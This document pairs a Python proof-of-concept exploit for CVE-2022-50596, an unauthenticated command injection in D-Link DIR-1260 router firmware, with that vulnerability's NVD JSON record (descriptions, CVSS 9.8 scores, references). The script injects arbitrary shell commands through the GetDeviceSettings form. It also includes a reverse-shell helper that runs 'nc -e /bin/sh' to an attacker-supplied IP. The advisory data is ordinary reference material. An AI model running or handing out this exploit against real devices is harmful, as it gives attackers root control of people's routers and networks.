CVE-2022-50596

#!/usr/bin/env python3 # CVE-2022-50596 PoC - D-Link DIR-1260 Command Injection # Target: D-Link DIR-1260 router firmware <= v1.20B05 import requests import sys import argparse def exploit(target_ip, target_port=8080, cmd='id'): """ Exploit CVE-2022-50596: Unauthenticated command injection in D-Link DIR-1260 Args: target_ip: IP address of the vulnerable router target_port: Management interface port (default: 8080) cmd: Command to execute on the target """ # Construct the malicious payload with command injection # The vulnerability is in GetDeviceSettings form's SetDest/Dest/Target parameter payload = f"'; {cmd} #" url = f"http://{target_ip}:{target_port}/GetDeviceSettings" # Prepare the POST data with the malicious payload data = { 'SetDest': '1', 'Dest': '1', 'Target': payload } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2022-50596-PoC)' } print(f"[*] Targeting {target_ip}:{target_port}") print(f"[*] Injecting command: {cmd}") print(f"[*] Payload: {payload}") try: response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Request sent successfully") print(f"[+] Status code: {response.status_code}") if response.text: print(f"[+] Response:\n{response.text[:500]}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True def reverse_shell(target_ip, attacker_ip, attacker_port=4444): """ Generate a reverse shell payload for CVE-2022-50596 """ # Netcat reverse shell payload cmd = f'nc -e /bin/sh {attacker_ip} {attacker_port}' exploit(target_ip, cmd=cmd) if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2022-50596 PoC') parser.add_argument('target', help='Target router IP address') parser.add_argument('-p', '--port', type=int, default=8080, help='Target port') parser.add_argument('-c', '--cmd', default='id', help='Command to execute') args = parser.parse_args() exploit(args.target, args.port, args.cmd)

{"cve": {"id": "CVE-2022-50596", "sourceIdentifier": "[email protected]", "published": "2025-11-06T20:15:40.450", "lastModified": "2025-11-28T17:00:26.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link DIR-1260 Wi-Fi router firmware versions up to and including v1.20B05 contain a command injection vulnerability within the web management interface that allows for unauthenticated attackers to execute arbitrary commands on the device with root privileges. The flaw specifically exists within the SetDest/Dest/Target arguments to the GetDeviceSettings form. The management interface is accessible over HTTP and HTTPS on the local and Wi-Fi networks and optionally from the Internet."}, {"lang": "es", "value": "El firmware del router Wi-Fi D-Link DIR-1260, versiones hasta e incluyendo v1.20B05, contiene una vulnerabilidad de inyección de comandos dentro de la interfaz de gestión web que permite a atacantes no autenticados ejecutar comandos arbitrarios en el dispositivo con privilegios de root. La falla específicamente existe dentro de los argumentos SetDest/Dest/Target del formulario GetDeviceSettings. La interfaz de gestión es accesible a través de HTTP y HTTPS en las redes locales y Wi-Fi y opcionalmente desde Internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-1260_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.20b05", "matchCriteriaId": "74E083F7-5F30-431A-B7F1-00E0A66664D7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-1260:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF5C311E-DB22-452B-BC26-265E3A84B57C"}]}]}], "references": [{"url": "https://blog.exodusintel.com/2022/05/11/d-link-dir-1260-getdevicesettings-pre-auth-command-injection-vulnerability/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10298", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dlink-dir1260-getdevicesettings-unauthenticated-command-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}